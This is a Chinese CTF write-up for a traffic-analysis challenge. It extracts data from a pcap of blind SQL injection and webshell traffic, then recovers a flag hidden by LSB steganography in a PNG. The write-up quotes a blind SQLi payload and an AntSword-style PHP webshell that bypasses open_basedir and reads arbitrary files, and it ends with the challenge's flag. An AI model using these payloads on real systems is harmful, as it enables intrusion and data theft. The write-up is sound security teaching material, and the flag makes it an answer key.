202403_QQ_httpSqlilab
流量分析,SQL注入,明文爆破,PNG,LSB隐写
Tags:流量分析,SQL注入,明文爆破 ,WebShell,PNG,LSB隐写
0x00. 题目
题目表述
附件路径:https://pan.baidu.com/s/1GyH7kitkMYywGC9YJeQLJA?pwd=Zmxh#list/path=/CTF附件
附件名称:202403_QQ_httpSqlilab.zip
0x01. WP
1. 找到hint信息
在Frame21中看到hintf1ag被分为了两部分
2. SQL注入流量信息提取,得到flag的前半部分
# -*- coding: utf-8 -*-
import pyshark, os, re,time
import nest_asyncio
nest_asyncio.apply()
# Author: Jason.J.Hu
# Create : 2023/12/11
# 初始化全局参数
strCapPath = "http_sqlilab.pcapng"
iHTTP=0
strFomula="frame.len == 776"
tFlag=""
cap = pyshark.FileCapture(strCapPath, display_filter=strFomula)
print(time.strftime("%H:%M:%S", time.localtime()), "HTTP分析开始 ... ...")
for pkt in cap:
intRequestNumber = pkt.number
print("\r\tFrame Number: %s" % str(intRequestNumber), end="")
for layer in pkt.layers:
if layer.layer_name == "http": # 指定协议层
# print(layer.field_names)
sURI=layer.get_field_value("response_for_uri") #指定字段
# http://127.0.0.1:3441/Less-5/?id=1'%20and%20substr((select%20group_concat(password)%20from%20users%20where%20username='f1'),1,1)='8'%20--+
sT=re.findall(r''',1\)='(.*?)'%20--+''',sURI) #正则匹配内容
#print(sURI)
tFlag=tFlag+sT[0]
iHTTP += 1
print("\r")
print(time.strftime("%H:%M:%S", time.localtime()), "HTTP分析结束。")
print(tFlag)
#
89504e470d0a1a0a0000000d4948445200000114000001140806000000ea70c97900000adf694343504943432050726f66696c650000789c9597075493c91680e7ffd343428004a4137a93de0248093d14e955544212482821260405bbb2b882ab82880896155c0151707529b28a88052b8a0dfb822c02ca73b16043e5fdc023ecee3befbdf36ece64be7373e79639333977002007b345a20c5801804c61b638c2df8b1e179f40c73d070440046400032336472262868505034466e7bfcafb7b009a9a6f5b4cf9faf7dfffab287179120e005022c2c95c092713e10e648c7144e26c0050c710bdfef26cd114df41982646124478788a5367f8cb14274f335a61da262ac21b610300f0
3. WebShell流量中得到flag后半部分
请求流量
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir=@ini_get("open_basedir");
if($opdir) {
$oparr=preg_split("/\\\\|\//",$opdir);
$ocwd=dirname($_SERVER["SCRIPT_FILENAME"]);
$ =".72b3b4";
mkdir($tmdir);
@chdir($tmdir);
@ini_set("open_basedir","..");
for($i=0;$i<sizeof($oparr);$i++){@chdir("..");}
@ini_set("open_basedir","/");
@rmdir($ocwd."/".$tmdir);
};
function asenc($out){return $out;};
function asoutput(){
$output=ob_get_contents();ob_end_clean();
echo "540"."b9b8";echo @asenc($output);echo "378"."d10";
}
ob_start();
try{
$F=base64_decode(substr($_POST["w6d6e6bfdd971b"],2));
$P=@fopen($F,"r");
echo(@fread($P,filesize($F)?filesize($F):4096));
@fclose($P);;
}
catch(Exception $e){echo "ERROR://".$e->getMessage();};
asoutput();
die();
w6d6e6bfdd971b=/var/www/html/sql-connections/ag
截取前后混淆信息后得到flag后半部分
24365b9c0a00c91ad1d37338a9881f5218c2d642ae4088f03a84dd397c361761242e989f999935c5a3089b20f62200c8348419c97ff299fa17ffc932ff6c76aa8c67ea9a16bc8f4022ca60e7fe9f5bf3bf2533433a1bc3081924be382002995591fdbb9f9e15246361f2c2d0591670a7eda7992f0d889e658ec43b6196b96c9f20d9da8c85c1b39c22f063c9fc64b3a2669927f18d9c657156842c568ad89b39cb6cf15c5c697ab44ccfe7b164fef3f851b1b39c23885938cb92f4c8a0391b6f995e2c8d90e5cf13fa7bcdc5f593d59e29f953bd02966c6d363f2a40563b7b2e7f9e9039e7531227cb8dcbf3f19db38996d98bb2bd64b1441961327b5e86bf4c2fc98994adcd460ee7dcda30d91ea6b103c36619f8005f108c7ce8201ad80227645883701092cd5b913d558c779628572c48e567d399c88de3d159428ee57cbaadb5ad2d0053f777e648bc8d98be97904afb9c2eeb207294df2377a6784e975c0a404b0112fae19cce601f00947c009a3b395271ce8c0e3df58541fe17288006d48036d00726c002c9cd11b8024f24e340100aa2403c580238800f3281182c07abc07a50008ac076b0135480fda01ad482a3e0386801a7c05970115c0537c15df008f48141f0128c81f7600282201c4486a8901aa4031942e6902dc480dc215f28188a80e2a12428151242526815b4112a824aa00ae8005407fd0c9d84ce4297a11ee801d40f8d406fa0cf300a26c134580b3682ad6006cc8483e02878319c0a2f83f3e07c782b5c0e57c147e066f82c7c15be0bf7c12fe1711440c9a15450ba280b1403e58d0a4525a0525062d41a5421aa0c55856a40b5a1ba50b7517da851d42734164d45d3d116685774003a1acd412f43af416f4157a06bd1cde8f3e8dbe87ef418fa1b868cd1c498635c302c4c1c2615b31c538029c31cc234612e60ee620631efb158ac0ad618eb840dc0c663d3b02bb15bb07bb18dd80e6c0f76003b8ec3e1d470e638375c288e8dcbc615e076e38ee0cee06ee106711ff172781dbc2dde0f9f8017e237e0cbf087f1edf85bf821fc044181604870218412b8845cc236c241421be1066190304154241a13dd8851c434e27a6239b1817881f898f8564e4e4e4fce592e5c4e20b74eae5cee98dc25b97eb94f24259219c99b94489292b6926a481da407a4b76432d988ec494e206793b792ebc8e7c84fc91fe5a9f296f22c79aefc5af94af966f95bf2af28048a2185495942c9a394514e506e504615080a460ade0a6c85350a950a27157a15c615a98a368aa18a998a5b140f2b5e561c56c2291929f92a7195f295aa95ce290d5051547daa379543dd483d48bd401da46169c634162d8d56443b4aeba68d292b29db2bc728af50ae543eaddca78252315261a964a86c5339ae724fe5f33cad79cc79bc799be735ccbb35ef83aa86aaa72a4fb550b551f5aeea6735ba9aaf5aba5ab15a8bda1375b4ba997ab8fa72f57dea17d44735681aae1a1c8d428de31a0f35614d33cd08cd959ad59ad734c7b5b4b5fcb5445abbb5ce698d6aab687b6aa769976ab76b8fe85075dc75043aa53a67745ed095e94c7a06bd9c7e9e3ea6aba91ba02bd53da0dbad3ba167ac17adb741af51ef893e519fa19fa25faadfa93f66a0631062b0caa0dee0a121c19061c837dc65d865f8c1c8d828d66893518bd1b0b1aa31cb38cfb8def8b109d9c4c364994995c91d53ac29c334dd74afe94d33d8ccc18c6f566976c31c3677341798ef35ef998f99ef3c5f38bf6a7eaf05c982699163516fd16fa962196cb9c1b2c5f2959581558255b15597d5376b07eb0ceb83d68f6c946c026d36d8b4d9bcb135b3e5d856dadeb123dbf9d9adb56bb57b6d6f6ecfb3df677fdf81ea10e2b0c9a1d3e1aba393a3d8b1c171c4c9c029c9698f532f83c608636c615c72c6387b39af753ee5fcc9c5d125dbe5b8cb1fae16aee9ae875d8717182fe02d38b860c04dcf8ded76c0adcf9dee9ee4fea37b9f87ae07dba3cae399a7be27d7f390e710d39499c63cc27ce565ed25f66af2fae0ede2bddabbc307e5e3ef53e8d3edabe41bed5be1fbd44fcf2fd5afde6fccdfc17fa57f4700262028a038a097a5c5e2b0ea5863814e81ab03cf07918222832a829e059b058b83db42e090c0901d218f171a2e142e6c0905a1acd01da14fc28cc39685fd1a8e0d0f0baf0c7f1e6113b12aa22b921ab934f270e4fb28afa86d518fa24da2a5d19d319498c498ba980fb13eb125b17d715671abe3aec6abc70be25b13700931098712c617f92edab96830d121b120f1de62e3c52b165f5ea2be2463c9e9a594a5eca527923049b1498793beb043d955ecf16456f29ee4318e376717e725d7935bca1de1b9f14a7843296e292529c3a96ea93b5247f81efc32fea8c05b5021789d1690b63fed437a687a4dfa64466c4663263e3329f3a45049982e3c9fa59db522ab47642e2a10f52d7359b673d99838487c480249164b5ab36948a3744d6a22fd4eda9fe39e5399f37179ccf2132b145708575ccb35cbdd9c3b94e797f7d34af44acecace55baabd6afea5fcd5c7d600db426794de75afdb5f96b07d7f9afab5d4f5c9fbefefa06eb0d251bde6d8cddd896af95bf2e7fe03bffefea0be40bc405bd9b5c37edff1efdbde0fbeecd769b776ffe56c82dbc52645d5456f4650b67cb951f6c7e28ff61726bcad6ee6d8edbf66dc76e176ebf57ec515c5ba258925732b02364477329bdb4b0f4ddcea53b2f97d997eddf45dc25ddd5571e5cdebadb60f7f6dd5f2af815772bbd2a1bf768eed9bce7c35eeede5bfb3cf735ecd7da5fb4fff38f821fef1ff03fd05c655455568dadcea97e7e30e660d74f8c9fea0ea91f2a3af4b54658d3571b517bbecea9aeeeb0e6e16df570bdb47ee448e2919b477d8eb63658341c6854692c3a068e498fbdf839e9e77bc7838e779e609c68f8c5f0973d4dd4a6c266a839b779ac85dfd2d71adfda7332f064679b6b5bd3af96bfd69cd23d55795af9f4b676627b7efbe499bc33e31da28ed1b3a967073a97763e3a1777eecef9f0f3dd17822e5cbae877f15c17b3ebcc25b74ba72ebb5c3e798571a5e5aae3d5e66b0ed79aae3b5c6fea76ec6ebee174a3f5a6f3cdb69e053dedb73c6e9dbded73fbe21dd69dab7717deedb9177def7e6f626fdf7deefde107190f5e3fcc7938f168dd63cce3c2270a4fca9e6a3eadfacdf4b7c63ec7bed3fd3efdd79e453e7b34c01978f9bbe4f72f83f9cfc9cfcb867486ea866d874f8df88ddc7cb1e8c5e04bd1cb89d1827f28fe63cf2b9357bffce1f9c7b5b1b8b1c1d7e2d7936fb6bc557b5bf3cefe5de778d8f8d3f799ef273e147e54fb58fb89f1a9eb73ece7a189e55f705fcabf9a7e6dfb16f4edf164e6e4a4882d664fb7022864c0292900bca941fae37800a83701202e9ae9afa7059a79134c13f84f3cd3834f8b2300d5bd0044ad0420f83a00bb2b909616f14f41de05611444ef0a603b3bd9f8974852ec6c677c913c90d6e4c9e4e45b130070c5007c2d9e9c9ca89e9cfc5a8d24fb08808edc99be7e4a148e202f9976bf10afe8a7471f83bfcb4ccfffa71aff3e83a90cecc1dfe77f02af4f1d4c2d88cdcf00000078655849664d4d002a000000080005011200030000000100010000011a0005000000010000004a011b0005000000010000005201280003000000010002000087690004000000010000005a00000000000000900000000100000090000000010002a00200040000000100000114a003000400000001000001140000000033384df10000040e49444154789cedd4418e9c301440c1efdcffcce32c0c34d26497274d14552d6884313648fdd6d7de7bf6cc3a879999d97bcd9a3d7bd6b9b667d6da33b366f6dc1766eff37bcfdfebdcfcdcba6766d6acb5cfb4ebe27a1e3a678de799d7169ea59e0d9db3ebd6f51ebfce3f277be6bdffe7ea3e5bbdc6ee97ddeb3cfff5aacffc99758ddf8bfe617ff767bbc65f9fe7cc7f8d7feefffeadcfb2d77ef76791cf715edff7b5d9eb39f02f587b9fbf3dc0dffaf5d31b00fe1f8202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202640405c8080a901114202328404650808ca000194101328202647e03f452591f37fccd2f0000000049454e44ae426082
4. 十六进制编辑器另存为png文件发现内容空白,尝试进行LSB隐写解码得到flag
flag:flag{8f5091fd-3be3-4a4c-adee-37d773627e25}
使用工具:stegsolve/随波逐流一把梭
浙公网安备 33010602011771号